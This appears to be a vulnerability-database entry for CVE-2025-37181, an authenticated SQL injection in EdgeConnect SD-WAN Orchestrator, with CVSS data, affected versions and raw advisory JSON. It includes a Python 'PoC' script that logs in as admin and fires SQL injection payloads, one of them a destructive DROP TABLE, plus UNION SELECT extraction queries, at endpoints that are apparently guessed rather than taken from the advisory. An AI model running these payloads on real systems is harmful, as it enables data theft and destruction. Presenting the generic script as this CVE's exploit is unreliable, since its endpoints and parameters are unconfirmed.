Security Vulnerability Report
中文
CVE-2025-37181 CVSS 7.2 HIGH

CVE-2025-37181

Published: 2026-01-14 17:16:05
Last Modified: 2026-01-20 18:17:47
Source: [email protected]

Description

Vulnerabilities in the web-based management interface of EdgeConnect SD-WAN Orchestrator could allow an authenticated remote attacker to perform SQL injection attacks. Successful exploitation could allow an attacker to execute arbitrary SQL commands on the underlying database, potentially leading to unauthorized data access or data manipulation.

CVSS Details

CVSS Score
7.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:arubanetworks:edgeconnect_sd-wan_orchestrator:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:arubanetworks:edgeconnect_sd-wan_orchestrator:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:arubanetworks:edgeconnect_sd-wan_orchestrator:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:arubanetworks:edgeconnect_sd-wan_orchestrator:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:arubanetworks:edgeconnect_sd-wan_orchestrator:9.6.0:*:*:*:*:*:*:* - VULNERABLE
EdgeConnect SD-WAN Orchestrator (版本待确认,请参考HPE官方公告)
建议联系HPE Support获取受影响版本的完整列表和修复版本信息

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-37181 SQL Injection PoC for HPE EdgeConnect SD-WAN Orchestrator # Authentication required (high privilege account) # Target: EdgeConnect SD-WAN Orchestrator Web Management Interface import requests import json import sys from urllib.parse import urlencode TARGET_URL = "https://<target-ip>/orchestrator/" USERNAME = "admin" PASSWORD = "admin_password" def login(): """Authenticate to the Orchestrator and obtain session cookie""" login_url = f"{TARGET_URL}api/v1/auth/login" data = { "username": USERNAME, "password": PASSWORD } headers = { "Content-Type": "application/json", "User-Agent": "Mozilla/5.0" } try: response = requests.post(login_url, json=data, headers=headers, verify=False, timeout=30) if response.status_code == 200: return response.cookies else: print(f"[-] Login failed: {response.status_code}") return None except Exception as e: print(f"[-] Connection error: {e}") return None def test_sql_injection(session_cookie): """Test for SQL injection vulnerability in search/filter parameters""" # Common vulnerable endpoint patterns in SD-WAN Orchestrators vulnerable_endpoints = [ "api/v1/devices/search", "api/v1/tunnels/filter", "api/v1/reports/query", "api/v1/config/search", "api/v1/users/list" ] # SQL injection payloads payloads = [ "' OR '1'='1", "' UNION SELECT NULL--", "' AND SLEEP(5)--", "'; DROP TABLE users;--" ] for endpoint in vulnerable_endpoints: for payload in payloads: test_url = f"{TARGET_URL}{endpoint}" params = {"q": payload, "limit": "10"} try: response = requests.get(test_url, params=params, cookies=session_cookie, verify=False, timeout=10) # Check for SQL error indicators if any(err in response.text.lower() for err in ['sql', 'syntax', 'error', 'mysql', 'postgres', 'sqlite']): print(f"[+] Potential SQL injection found at {endpoint}") print(f"[+] Payload: {payload}") print(f"[+] Response snippet: {response.text[:200]}") return True except: continue return False def extract_data(session_cookie): """Extract database information using SQL injection""" # Example: Extract database version and user info extract_endpoints = [ "api/v1/reports/query", "api/v1/audit/logs" ] # Data extraction payloads extract_payloads = [ "' UNION SELECT version(),user(),database()--", "' UNION SELECT table_name,column_name,data_type FROM information_schema.columns--" ] for endpoint in extract_endpoints: for payload in extract_payloads: extract_url = f"{TARGET_URL}{endpoint}" params = {"filter": payload} try: response = requests.get(extract_url, params=params, cookies=session_cookie, verify=False, timeout=30) if response.status_code == 200: print(f"[*] Extracted data from {endpoint}:") print(response.text[:500]) except: continue if __name__ == "__main__": print("[*] CVE-2025-37181 SQL Injection PoC") print("[*] Target: HPE EdgeConnect SD-WAN Orchestrator") # Step 1: Login with high-privilege account print("\n[1] Attempting authentication...") session = login() if not session: print("[-] Authentication failed. Exiting.") sys.exit(1) print("[+] Authentication successful") # Step 2: Test for SQL injection print("\n[2] Testing for SQL injection vulnerability...") if test_sql_injection(session): print("[+] SQL injection vulnerability confirmed!") # Step 3: Extract data (for authorized security testing only) print("\n[3] Attempting data extraction (authorized testing only)...") extract_data(session) else: print("[-] No SQL injection detected or target not vulnerable")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-37181", "sourceIdentifier": "[email protected]", "published": "2026-01-14T17:16:05.497", "lastModified": "2026-01-20T18:17:46.710", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vulnerabilities in the web-based management interface of EdgeConnect SD-WAN Orchestrator could allow an authenticated remote attacker to perform SQL injection attacks. Successful exploitation could allow an attacker to execute arbitrary SQL commands on the underlying database, potentially leading to unauthorized data access or data manipulation."}, {"lang": "es", "value": "Vulnerabilidades en la interfaz de gestión basada en web de EdgeConnect SD-WAN Orchestrator podrían permitir a un atacante remoto autenticado realizar ataques de inyección SQL. La explotación exitosa podría permitir a un atacante ejecutar comandos SQL arbitrarios en la base de datos subyacente, lo que podría llevar a un acceso no autorizado a datos o manipulación de datos."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:arubanetworks:edgeconnect_sd-wan_orchestrator:*:*:*:*:*:*:*:*", "versionStartIncluding": "9.2.0", "versionEndIncluding": "9.2.10", "matchCriteriaId": "4972AD17-B8C3-4E30-B757-0B5BB830B28C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:arubanetworks:edgeconnect_sd-wan_orchestrator:*:*:*:*:*:*:*:*", "versionStartIncluding": "9.3.0", "versionEndIncluding": "9.3.6", "matchCriteriaId": "48DA7E3C-5E4C-4A91-872E-F278046A3146"}, {"vulnerable": true, "criteria": "cpe:2.3:a:arubanetworks:edgeconnect_sd-wan_orchestrator:*:*:*:*:*:*:*:*", "versionStartIncluding": "9.4.0", "versionEndIncluding": "9.4.4", "matchCriteriaId": "F65E7518-5652-4651-B8B8-25C763044E7B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:arubanetworks:edgeconnect_sd-wan_orchestrator:*:*:*:*:*:*:*:*", "versionStartIncluding": "9.5.0", "versionEndExcluding": "9.5.6", "matchCriteriaId": "6C96154A-927C-4F4C-B00E-9E10340859A0"}, {"vulnerable": true, "criteria": "cpe:2.3:a:arubanetworks:edgeconnect_sd-wan_orchestrator:9.6.0:*:*:*:*:*:*:*", "matchCriteriaId": "B5EBF5C1-4470-40F0-9812-1729E7E42DA0"}]}]}], "references": [{"url": "https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04992en_us&docLocale=en_US", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.